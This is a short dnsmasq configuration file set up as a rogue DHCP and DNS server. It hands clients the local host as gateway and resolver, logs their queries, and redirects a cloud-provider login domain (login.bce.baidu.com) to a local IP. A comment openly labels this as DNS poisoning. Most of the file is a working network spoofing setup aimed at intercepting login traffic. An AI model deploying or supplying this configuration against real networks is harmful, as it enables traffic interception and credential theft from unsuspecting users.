# Clear DNS caches when reload dnsmasq
clear-on-reload

# DNS cache size
cache-size=0

# Use your interface instead
interface=eth0

# DHCP settings
dhcp-range=10.0.0.10,10.0.0.250,12h
dhcp-option=3,10.0.0.1
dhcp-option=6,10.0.0.1

# DNS server, whom to query, if no found in local DNS server 
server=8.8.8.8

# Activate DNS poisoning a particular website to your IP address. No offense, it is for instance
address=/login.bce.baidu.com/192.168.1.102

# Enable log queries
log-queries

# Set for the listening address
listen-address=127.0.0.1

